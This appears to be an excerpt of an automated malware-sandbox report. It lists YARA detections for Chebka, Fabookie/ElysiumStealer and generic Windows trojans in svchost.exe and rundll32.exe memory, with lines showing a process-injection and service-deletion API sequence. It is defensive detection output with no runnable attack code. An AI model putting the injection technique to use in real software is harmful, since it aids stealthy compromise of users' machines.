        Source: Yara match, File source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 4628, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 4776, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 5440, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 2508, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 368, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 2112, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 2372, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 2340, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1148, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 2564, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1080, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 3460, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1492, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1924, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1364, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 3584, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1204, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_04649910 WaitForSingleObject,GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,CloseHandle,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle
        Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 5_2_04643A60 OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,DeleteService,wsprintfW,SHDeleteKeyW,CloseServiceHandle,CloseServiceHandle
        Source: file.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_MSDOS_Stub_Message (date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings)
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_Chebka (author = ditekSHen, description = Detects Chebka)
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Generic_a681f24a (reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23)
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka, Windows_Trojan_Generic_a681f24a (rule metadata as above)
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE; Matched rules: SUSP_XORed_MSDOS_Stub_Message, MALWARE_Win_Chebka (rule metadata as above)
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
